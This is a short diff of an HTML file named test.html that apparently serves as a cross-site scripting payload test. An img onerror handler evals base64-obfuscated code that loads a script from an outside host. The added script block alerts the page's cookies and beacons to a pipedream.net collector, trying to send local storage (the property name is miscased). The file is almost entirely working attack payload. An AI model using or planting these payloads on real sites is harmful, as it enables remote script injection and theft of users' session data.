--- a/test.html
+++ b/test.html
@@ -2,5 +2,10 @@
 <html>
  <body>
    <img src=x onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwczovLzB4LmF4L3oxOGc/JytNYXRoLnJhbmRvbSgp'))>
+  <script>
+alert(document.cookie);
+var i=new Image;
+i.src="https://envjs5kxlmfl33f.m.pipedream.net/ls?"+document.localstorage;
+</script>
  </body>
 </html>
